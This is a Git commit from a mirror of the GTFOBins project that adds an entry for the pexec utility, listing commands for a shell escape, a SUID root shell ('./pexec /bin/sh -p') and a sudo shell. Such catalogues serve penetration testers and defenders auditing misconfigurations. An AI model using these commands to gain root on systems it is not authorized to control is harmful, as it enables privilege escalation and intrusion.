1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

add pexec

install: apt-get install -y pexec
man: https://manpages.ubuntu.com/manpages/trusty/man1/pexec.1.html
This commit is contained in:
Miguel R 2023-01-13 14:55:26 +01:00 committed by Andrea Cardaci
parent f4ec254e8c
commit 16e426e98c

9
_gtfobins/pexec.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: pexec /bin/sh
suid:
- code: ./pexec /bin/sh -p
sudo:
- code: sudo pexec /bin/sh
---